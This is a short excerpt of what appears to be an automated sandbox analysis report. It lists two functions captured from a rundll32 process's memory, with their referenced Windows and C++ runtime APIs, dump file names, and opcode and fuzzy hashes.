                      Download Yara Rule
                      APIs
                      • GetLargePageMinimum.KERNEL32 ref: 6D086721
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: LargeMinimumPage
                      • String ID: 3$T
                      • API String ID: 2015960775-1149433488
                      • Opcode ID: 349d95263e385fd0a1fce2f75362b56846f13d05461ee2326b0a010cd569e047
                      • Instruction ID: 0942de21cce209909727e4db2a0f5b287d4a8d37f765589630d609ced1148830
                      • Opcode Fuzzy Hash: 349d95263e385fd0a1fce2f75362b56846f13d05461ee2326b0a010cd569e047
                      • Instruction Fuzzy Hash: 9861EF78916298CEDF14CFA9C59079DBFB9BF5A310F10809AD848A7351E3740A45CB96
                      Function 7F347AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                      Download Yara Rule
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F347AF3
                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F347BBF
                        • Part of subcall function 7F3D0322: _Yarn.LIBCPMT ref: 7F3D0341
                        • Part of subcall function 7F3D0322: _Yarn.LIBCPMT ref: 7F3D0365
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                      • String ID: bad locale name
                      • API String ID: 1908188788-1405518554
                      • Opcode ID: 4adaf1e430731bae81e4079aeb41c96c6f198f70908830cff4ed8ba3f39f1c2e
                      • Instruction ID: f9c48051be3a0f43705c04a6bb9d1e983eb12cf703174738dd1e5e2961994136
                      • Opcode Fuzzy Hash: 4adaf1e430731bae81e4079aeb41c96c6f198f70908830cff4ed8ba3f39f1c2e
                      • Instruction Fuzzy Hash: D841E6B4905289DFDB01CFA8C954BAEFBF1BF49304F248199D415AB381C77A9A01CBA5